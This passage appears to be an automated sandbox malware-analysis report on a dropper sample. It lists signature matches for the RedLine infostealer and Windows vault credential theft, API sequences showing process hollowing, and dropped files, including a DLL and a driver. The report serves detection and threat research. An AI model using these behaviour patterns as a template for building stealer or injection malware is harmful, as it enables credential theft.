Source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	0_2_02A2CA40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2B684 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_02A2B684
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2B768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_02A2B768
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A2B5FC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_02A2B5FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029EFB80 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_029EFB80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029F7E4C CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029F7E4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029EFCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_029EFCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029EFD38 LoadLibraryExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtProtectVirtualMemory,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	0_2_029EFD38
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029DCA40 WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,	6_2_029DCA40
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029DB768 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	6_2_029DB768
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_0299FB80 GetProcAddress,NtAllocateVirtualMemory,	6_2_0299FB80
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029A7E4C GetMonitorInfoA,CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,GetMonitorInfoA,NtWriteVirtualMemory,NtWriteVirtualMemory,GetSystemMetrics,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	6_2_029A7E4C
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_0299FCD8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	6_2_0299FCD8
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_0299FD38 LoadLibraryExA,GetProcAddress,GetCurrentProcess,NtWriteVirtualMemory,FreeLibrary,	6_2_0299FD38
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029BF340 NtdllDefWindowProc_A,GetCapture,	6_2_029BF340
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D3114 NtdllDefWindowProc_A,	6_2_029D3114
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029DB684 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	6_2_029DB684
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029BF5FD NtdllDefWindowProc_A,	6_2_029BF5FD
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D38CC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	6_2_029D38CC
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029D3990 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	6_2_029D3990
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029B3E00 GetSubMenu,SaveDC,RestoreDC,NtdllDefWindowProc_A,	6_2_029B3E00

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

Code function: 0_2_02A2CA40 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,CopyFileA,GetCurrentProcess,ExitProcess,

0_2_02A2CA40

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe

File created: C:\Users\Public\Libraries\truesight.sys

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A4A1DD	0_2_02A4A1DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_029D2160	0_2_029D2160
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A1C508	0_2_02A1C508
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A4AACF	0_2_02A4AACF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A3EFBB	0_2_02A3EFBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A48D18	0_2_02A48D18
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A4906B	0_2_02A4906B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A5BA28	0_2_02A5BA28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A459D6	0_2_02A459D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: 0_2_02A03E00	0_2_02A03E00
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_0040DC11	5_2_0040DC11
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00407C3F	5_2_00407C3F
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00418CCC	5_2_00418CCC
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00406CA0	5_2_00406CA0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_004028B0	5_2_004028B0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_0041A4BE	5_2_0041A4BE
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00418244	5_2_00418244
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00401650	5_2_00401650
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_004193C4	5_2_004193C4
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00418788	5_2_00418788
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00402F89	5_2_00402F89
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_00402B90	5_2_00402B90
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_004073A0	5_2_004073A0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_31B4DAE0	5_2_31B4DAE0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_31B4CEC8	5_2_31B4CEC8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_31B4D210	5_2_31B4D210
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_31B41030	5_2_31B41030
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_31B40FD0	5_2_31B40FD0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_3556ED70	5_2_3556ED70
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_3556F45B	5_2_3556F45B
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_355697B9	5_2_355697B9
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35565A90	5_2_35565A90
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35566288	5_2_35566288
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_3556CAA0	5_2_3556CAA0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_3556BC88	5_2_3556BC88
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35560040	5_2_35560040
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_3556001A	5_2_3556001A
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_355698F8	5_2_355698F8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35569230	5_2_35569230
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C0C4D0	5_2_35C0C4D0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C01C20	5_2_35C01C20
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C05648	5_2_35C05648
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C061B0	5_2_35C061B0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C0A0E8	5_2_35C0A0E8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C05220	5_2_35C05220
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C01530	5_2_35C01530
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C08680	5_2_35C08680
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C0D908	5_2_35C0D908
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C02278	5_2_35C02278
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35C06A30	5_2_35C06A30
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_360B11A0	5_2_360B11A0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_360BF2B0	5_2_360BF2B0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_361B4851	5_2_361B4851
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00408C60	5_1_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_0040DC11	5_1_0040DC11
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00407C3F	5_1_00407C3F
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00418CCC	5_1_00418CCC
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00406CA0	5_1_00406CA0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_004028B0	5_1_004028B0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_0041A4BE	5_1_0041A4BE
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00408C60	5_1_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00418244	5_1_00418244
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00401650	5_1_00401650
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00402F20	5_1_00402F20
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_004193C4	5_1_004193C4
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00418788	5_1_00418788
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00402F89	5_1_00402F89
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_00402B90	5_1_00402B90
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_1_004073A0	5_1_004073A0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 5_2_35569608	5_2_35569608
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_02982160	6_2_02982160
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029CC508	6_2_029CC508
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: 6_2_029B3E00	6_2_029B3E00
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_0040DC11	8_2_0040DC11
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00407C3F	8_2_00407C3F
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00418CCC	8_2_00418CCC
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00406CA0	8_2_00406CA0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_004028B0	8_2_004028B0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_0041A4BE	8_2_0041A4BE
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00418244	8_2_00418244
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00401650	8_2_00401650
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00402F20	8_2_00402F20
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_004193C4	8_2_004193C4
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00418788	8_2_00418788
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00402F89	8_2_00402F89
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_00402B90	8_2_00402B90
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_004073A0	8_2_004073A0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_31B5DAF0	8_2_31B5DAF0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_31B5CED8	8_2_31B5CED8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_31B5D220	8_2_31B5D220
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_31B51030	8_2_31B51030
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_31B50FD0	8_2_31B50FD0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35429540	8_2_35429540
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_3542ED70	8_2_3542ED70
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_3542F45B	8_2_3542F45B
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35425E00	8_2_35425E00
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35426288	8_2_35426288
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_3542CAA0	8_2_3542CAA0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_3542BC88	8_2_3542BC88
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35420040	8_2_35420040
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35420006	8_2_35420006
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA5400	8_2_35AA5400
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AAC6A0	8_2_35AAC6A0
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA7150	8_2_35AA7150
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA5828	8_2_35AA5828
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA6390	8_2_35AA6390
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AAAAAF	8_2_35AAAAAF
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AAA2C8	8_2_35AAA2C8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AADAC8	8_2_35AADAC8
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA6C10	8_2_35AA6C10
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA2458	8_2_35AA2458
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA1710	8_2_35AA1710
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AA8860	8_2_35AA8860
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_35AAAACD	8_2_35AAAACD
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: 8_2_354298E9	8_2_354298E9

Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: Joe Sandbox View	Dropped File: C:\Users\Public\Libraries\netutils.dll C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: String function: 029D4980 appears 77 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: String function: 029D4788 appears 78 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: String function: 029D6B54 appears 86 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	Code function: String function: 029D4B0C appears 363 times
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: String function: 02984B0C appears 363 times
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: String function: 02986B54 appears 86 times
Source: C:\Users\Public\Libraries\Clmgncrs.PIF	Code function: String function: 02984980 appears 77 times
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\srcngmlC.pif	Code function: String function: 0040E1D8 appears 129 times

Source: netutils.dll.0.dr

Static PE information: Number of sections : 19 > 10

Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameeasinvoker.exej% vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTruesight4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamead753d94-f829-499e-a4a4-e302c212bbe7.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2 vs SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
